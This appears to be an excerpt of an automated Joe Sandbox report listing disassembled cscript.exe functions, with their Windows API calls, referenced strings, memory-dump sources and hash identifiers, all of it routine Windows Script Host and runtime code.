                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                      • Instruction ID: 5d2287009b334b80f932f74c77fdb8f21e102a7f4a530278e0342ebf5bbe88da
                                                      • Opcode Fuzzy Hash: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                      • Instruction Fuzzy Hash: 294126317057029FDB24DE25D881B6AB7E6EF88714F000A5DF95ADB780DB30F5059B91
                                                      Function 04BCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C0728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C07294
                                                      • RTL: Resource at %p, xrefs: 04C072A3
                                                      • RTL: Re-Waiting, xrefs: 04C072C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                      • Instruction ID: 11c88b374c05c67a5079e53d5518056ed340b5bb87273e4fd187ea586cf269c0
                                                      • Opcode Fuzzy Hash: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                      • Instruction Fuzzy Hash: DB410F31709216ABDB24DE25CC82B6AB7A6FB84714F10465CF955EB280EB30F9529BD0
                                                      Function 04C42300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
                                                      • Instruction ID: ba2e042a28e7f53a0522f12c1a777764daa441af52eee868f8d73e5e4ec48302
                                                      • Opcode Fuzzy Hash: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
                                                      • Instruction Fuzzy Hash: E6314372A006199FDB20DF29CD41BAEB7FDEB44754F4445D9E849E3240EB30BA449BA1
                                                      Function 00632B3F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(?,Shell,00000000,00020006,?,00000000,?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B53
                                                      • RegSetValueExA.ADVAPI32(?,00623EFE,00000000,00000001,006329F1,00000001,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B89
                                                      • RegCloseKey.ADVAPI32(?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenValue
                                                      • String ID: Shell
                                                      • API String ID: 779948276-2220072441
                                                      • Opcode ID: 1db48161889e5707fc372cede4a9c67a49872c81fd488cbbcd6df430192f23e1
                                                      • Instruction ID: a4e8f32331c1ecaf7ef588fa49e7b59d316b0b171cf1c283d72642024997d130
                                                      • Opcode Fuzzy Hash: 1db48161889e5707fc372cede4a9c67a49872c81fd488cbbcd6df430192f23e1
                                                      • Instruction Fuzzy Hash: 9B012637A00121BBDB254E949C15FBAB73BAB84B48F118158BD82AB280C672DE0596D0
                                                      Function 00632AB3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,00632BFE,Open2,00000000,WSFFile,?,00632BFE,?,?,?,?,Open2,00000000), ref: 00632ACF
                                                      • RegCreateKeyA.ADVAPI32(80000001,?,00632BFE), ref: 00632ADE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateOpen
                                                      • String ID: Open2$WSFFile
                                                      • API String ID: 436179556-2493992722
                                                      • Opcode ID: 4528a29c5427f02491efefa509fcb5d438da3186addb12916e030bccdf26b2f0
                                                      • Instruction ID: e4e85c1b1a4818f496338af9fef9cfb772e11acd9fe7e1d1c12feb62622b4fdc
                                                      • Opcode Fuzzy Hash: 4528a29c5427f02491efefa509fcb5d438da3186addb12916e030bccdf26b2f0
                                                      • Instruction Fuzzy Hash: 55E06D722002667797300AAA5C48EA7AEAEEB85BF1F154026B945D6251C9B9CC00E2F0
                                                      Function 006322AA Relevance: 6.2, APIs: 4, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateErrorInfo.OLEAUT32(?,?,00000000,?,?,?), ref: 006322C7
                                                      • SetErrorInfo.OLEAUT32(00000000,?,?,00000000,?), ref: 0063241A
                                                      • SysFreeString.OLEAUT32(?), ref: 0063246D
                                                      • SysFreeString.OLEAUT32(?), ref: 00632476
                                                        • Part of subcall function 0062BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                        • Part of subcall function 0062BCDF: SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                        • Part of subcall function 0062BCDF: LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ErrorInfo$AllocCreateFormatLocalMessage
                                                      • String ID:
                                                      • API String ID: 2475300705-0
                                                      • Opcode ID: 4d7c1ee301a2cd7e0096e7f2df0146772b6705bd8b1e5a9922f18ff82c4c3d70
                                                      • Instruction ID: 0bad160f97b2adc8a99b5ae08efe2e8d74e20d286e474e52637d213e598d7ced
                                                      • Opcode Fuzzy Hash: 4d7c1ee301a2cd7e0096e7f2df0146772b6705bd8b1e5a9922f18ff82c4c3d70
                                                      • Instruction Fuzzy Hash: 34518E75B006169FCB01DF95E8A4A5E7BF7EF48314F250069E60297351DF35AE029BC1
                                                      Function 0062A160 Relevance: 6.1, APIs: 4, Instructions: 111memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 0062A1C1
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A1FE
                                                      • SafeArrayPutElement.OLEAUT32(2C6A5756,?,?), ref: 0062A21D
                                                      • VariantClear.OLEAUT32(?), ref: 0062A22A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                      • String ID:
                                                      • API String ID: 90143694-0
                                                      • Opcode ID: e27e9e3d01e0e689ce613430a1d1424813d853829687b216d74397fd4655923e
                                                      • Instruction ID: 8dfd67139f07c5890180c91b51bdfd0abad886213550f11edf1cc08c7af2c2d6
                                                      • Opcode Fuzzy Hash: e27e9e3d01e0e689ce613430a1d1424813d853829687b216d74397fd4655923e
                                                      • Instruction Fuzzy Hash: 7041AF71A0061ADBDB00CFD5D894AAEB7B6FB48310F148069E811E7340DB76DE45CF96
                                                      Function 00629E10 Relevance: 6.1, APIs: 4, Instructions: 103memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629E5A
                                                      • SysAllocString.OLEAUT32(?), ref: 00629E87
                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 00629EA3
                                                      • VariantClear.OLEAUT32(?), ref: 00629EAF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                      • String ID:
                                                      • API String ID: 90143694-0
                                                      • Opcode ID: ac1ea37a5df391e540e99eecd37d27ebcb4b9d4c1a5bcf66258a6d9f2ad44e59
                                                      • Instruction ID: 0f8ddfc5affbb2059da2615fefac0471e33755ce67d90106163807015cb8ea9d
                                                      • Opcode Fuzzy Hash: ac1ea37a5df391e540e99eecd37d27ebcb4b9d4c1a5bcf66258a6d9f2ad44e59
                                                      • Instruction Fuzzy Hash: 7F318271B0071A9BDB00DFA5D894AAEBBFAEF88710F104129E901D7351DB71DD058BD5
                                                      Function 0062D3E0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0062D3F5
                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 0062D438
                                                      • VariantClear.OLEAUT32(?), ref: 0062D471
                                                        • Part of subcall function 0062D500: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0062D51D
                                                      • VariantClear.OLEAUT32(?), ref: 0062D487
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Variant$ArrayClearSafe$BoundElementInit
                                                      • String ID:
                                                      • API String ID: 1178528639-0
                                                      • Opcode ID: 03969bd80011f21f6dd4c824c0b19d61f6aa6be2dbe115bda0546fb10c6f4c13
                                                      • Instruction ID: 839eb34ed4f6d06c8c11eb4b60636ebf06bbe02df71b34437693603eddff3883
                                                      • Opcode Fuzzy Hash: 03969bd80011f21f6dd4c824c0b19d61f6aa6be2dbe115bda0546fb10c6f4c13
                                                      • Instruction Fuzzy Hash: 9F211B712047169BC704EF64E89496B7BEAAB88754F10093DF996C3251DB30EE09CB96
                                                      Function 0062A410 Relevance: 6.1, APIs: 4, Instructions: 81COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 0062A43E
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A47F
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A488
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A491
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ArrayDestroySafe
                                                      • String ID:
                                                      • API String ID: 4164600000-0
                                                      • Opcode ID: 518ca94931758e1cb01cf4b263f657d584135246f3530544af2fa3db7e80b379
                                                      • Instruction ID: 32384777000c19b5926f0869175e7ce8e62bd81ed4b21d454ffdb62e5f9ce36c
                                                      • Opcode Fuzzy Hash: 518ca94931758e1cb01cf4b263f657d584135246f3530544af2fa3db7e80b379
                                                      • Instruction Fuzzy Hash: 20219C70600A28DFC720AFA4E94C92ABBF7FF44314B10991CE14687721CBB2EC409F86
                                                      Function 0062A6F5 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(?,?,00000800,00000C89), ref: 0062A737
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A74A
                                                      • LoadStringA.USER32(?,?,00000800,00000C89), ref: 00630C03
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000C89,00000000,00000000,?,0062F960), ref: 00630C24
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$Load$AllocByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1944948655-0
                                                      • Opcode ID: 1aae10f1e0665cf296268f1df6f543c1c2de8a3924d9a2ce1c661af25518d21a
                                                      • Instruction ID: 29bd3b62c671c58f54ea46084efeb6403145c183d27c0d772b3d2795d6488f28
                                                      • Opcode Fuzzy Hash: 1aae10f1e0665cf296268f1df6f543c1c2de8a3924d9a2ce1c661af25518d21a
                                                      • Instruction Fuzzy Hash: FA11CA75600229AFE7118BA4EC04AEAB7FEEB48740F0840A5B941D2290DB708E09CFE4
                                                      Function 0062B580 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileSize.KERNEL32(0062B2EA,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0062B595
                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0062B5B6
                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000), ref: 0062B5D0
                                                      • GetLastError.KERNEL32(?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0063142A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLastMappingSizeView
                                                      • String ID:
                                                      • API String ID: 2735091159-0
                                                      • Opcode ID: 03cd76c34e6d516aa8a0db2b1c8d69c6bf91f67bbdf6b6d1acb5757940cd9ed2
                                                      • Instruction ID: 07e7fa3be5064c688c777ee1b2b23cfa23868b70c1f85bf7dbf536ebbc5a4856
                                                      • Opcode Fuzzy Hash: 03cd76c34e6d516aa8a0db2b1c8d69c6bf91f67bbdf6b6d1acb5757940cd9ed2
                                                      • Instruction Fuzzy Hash: 5701F970240712AFE7301F755C09F6677DAEF00720F309529BA95EE2E0E770E4419B94
                                                      Function 0062865B Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 0062867A
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006307D4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: MessageMultipleObjectsPeekWait
                                                      • String ID:
                                                      • API String ID: 3986374578-0
                                                      • Opcode ID: 458e40291c44fbf3ba2ce5fd48283c0fa86d0bb3cbe4d5ecdf2b581f35496837
                                                      • Instruction ID: e96c177d418d56cc35df4e3f3ff19f0a41964899eaa33de7ed455d6c123227e8
                                                      • Opcode Fuzzy Hash: 458e40291c44fbf3ba2ce5fd48283c0fa86d0bb3cbe4d5ecdf2b581f35496837
                                                      • Instruction Fuzzy Hash: 86F096724011257B9B109BE69C4CCEF7B7EEEC67207140215F511E2194D635D605DBF1
                                                      Function 04BD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 73c811ced668665b9063b238c16017b956f6b88c948527438643f63d9cef9580
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 59919270E002569BDF38DE69C881AFEB7A5EF44720F5449DAE865E72C0FF30A9418760
                                                      Function 04B99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                      • Instruction ID: b50b94d581e636404f4a98d3b0e3de3166a23488acedf31cc35f2237ee902338
                                                      • Opcode Fuzzy Hash: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                      • Instruction Fuzzy Hash: 17810DB5D00269ABDB35DF54CC44BEEB7B4AB48714F0041EAAA1DB7240E7716E94CFA0
                                                      Function 04C1CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 04C1CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 989b96ccad6d8bf8810719ec3dafd93e9cc1306406cc331f13e7d471ceea1121
                                                      • Instruction ID: 155ce8a08eb38f3f32a4c8aae91e55f64e47e90610417a5fe929101aac38d1d6
                                                      • Opcode Fuzzy Hash: 989b96ccad6d8bf8810719ec3dafd93e9cc1306406cc331f13e7d471ceea1121
                                                      • Instruction Fuzzy Hash: 4941CE71A00254DFDB219FA9D840AAEBBF9FF45B08F00416EE906DB260E734F901DB64
                                                      Function 0062D2B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ActiveWindow
                                                      • String ID: WSH$WScript
                                                      • API String ID: 2558294473-1019903269
                                                      • Opcode ID: 608b9e08e6f1ecd77c943572b41aa99f63710a4069232a7af9637605d6dec08c
                                                      • Instruction ID: ce74c26ec84274810c5fd08cee7609f25d82ecde6f89fd4e8b933569908327ed
                                                      • Opcode Fuzzy Hash: 608b9e08e6f1ecd77c943572b41aa99f63710a4069232a7af9637605d6dec08c
                                                      • Instruction Fuzzy Hash: 8811D675700A258BC710DF28F844EAA3797AF95320B244159F915CB3E0DA35DC42CF96
                                                      Function 0062C587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,0062C4E7,?,?,?), ref: 0062C598
                                                      • CoCreateInstance.OLE32(?,00000000,00000015,00623BD4,?,?,?,?,0062C4E7,?,?,?), ref: 0062C5DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateFromInstanceProg
                                                      • String ID: WScript.CreateObject
                                                      • API String ID: 2151042543-1366894974
                                                      • Opcode ID: 10b58bbbd37bf8bf5800ab3a6aed37f90b768e9e902549fef6ad2d6be97787d4
                                                      • Instruction ID: 45d4f8c2ea4739fe7ea843786b981bce65b01eb50cc537d4abd7ca72f75620a4
                                                      • Opcode Fuzzy Hash: 10b58bbbd37bf8bf5800ab3a6aed37f90b768e9e902549fef6ad2d6be97787d4
                                                      • Instruction Fuzzy Hash: 0511E936E40A39BBDB121B80DC06F9D7A23EB05B61F124118FF007A291D7B19E50ABD9
                                                      Function 00632607 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0063748C: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,?,?,80000001,80000001,?,00632623), ref: 006374BE
                                                      • RegCloseKey.ADVAPI32(?,00000000,?,00020006,?,?,?,?,0062F129), ref: 00632666
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseCreate
                                                      • String ID: DisplayLogo$Timeout
                                                      • API String ID: 2932200918-1251482861
                                                      • Opcode ID: 1037f4a5ecf5a088285f7d91174251673b359add841219ad11da8dda1e3cca6e
                                                      • Instruction ID: 25704a081a534a67af7b59afe9b3ba2be5b95c9774564a379a0aadf24f61a571
                                                      • Opcode Fuzzy Hash: 1037f4a5ecf5a088285f7d91174251673b359add841219ad11da8dda1e3cca6e
                                                      • Instruction Fuzzy Hash: F9F0C8B1B042217BD72092548D67B9ABEDBDF81750F244065EA059B381D7B4ED01D7D1
                                                      Function 00632B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(?,ScriptEngine,00000000,00020019,?,00000000,?,?,00632A5F,?,006329F1,00000000), ref: 00632B18
                                                      • RegCloseKey.ADVAPI32(?,?,00632A5F,?,006329F1,00000000), ref: 00632B27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen
                                                      • String ID: ScriptEngine
                                                      • API String ID: 47109696-298518336
                                                      • Opcode ID: 1bd355f673ac8eb45d17d1e5bfd78c503eaf6e7274805dd283e7fc33ec9c21e6
                                                      • Instruction ID: 32960be44cb7b434b5bbc9d5c1903dd0b81ca9eadc75bc258f06e19a3d0ff162
                                                      • Opcode Fuzzy Hash: 1bd355f673ac8eb45d17d1e5bfd78c503eaf6e7274805dd283e7fc33ec9c21e6
                                                      • Instruction Fuzzy Hash: E3E08677E40335B7C73647849C16F9BB66EEB44B59F120111FD81FA280D665DE0055D0